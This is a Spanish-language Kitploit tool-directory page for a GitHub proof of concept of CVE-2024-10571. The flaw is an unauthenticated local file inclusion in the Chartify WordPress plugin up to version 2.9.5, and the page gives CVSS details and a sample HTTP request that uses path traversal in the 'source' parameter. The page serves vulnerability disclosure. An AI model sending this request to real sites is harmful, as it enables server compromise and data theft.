Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10571 — Chartify – Plugin de gráficos de WordPress <= 2.9.5 - Inclusión de archivos locales no autenticada a través de la fuente | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-10571
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-10571

CVE-2024-10571

Chartify – Plugin de gráficos de WordPress <= 2.9.5 - Inclusión de archivos locales no autenticada a través de la fuente

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-10571

Chartify – Plugin de gráficos para WordPress <= 2.9.5 - Inclusión de archivos locales no autenticada a través de source

Descripción

El plugin Chartify – WordPress Chart Plugin para WordPress es vulnerable a Inclusión de Archivos Locales en todas las versiones hasta la 2.9.5 inclusive a través del parámetro 'source'. Esto permite que atacantes no autenticados incluyan y ejecuten archivos arbitrarios en el servidor, permitiendo la ejecución de cualquier código PHP en esos archivos. Esto puede utilizarse para eludir controles de acceso, obtener datos sensibles o lograr ejecución de código en casos donde se puedan subir e incluir imágenes y otros tipos de archivos "seguros".

Detalles

  • Tipo: plugin
  • Slug: chart-builder
  • Versión afectada: 2.9.5
  • Puntuación CVSS: 9.8
  • Calificación CVSS: Crítica
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-10571
  • Estado: Activo

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../../../var/www/html/poc&type=chart-js HTTP/1.1
Host: wp.local
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

action=ays_chart_admin_ajax&function=display_plugin_charts_page
Descargar herramienta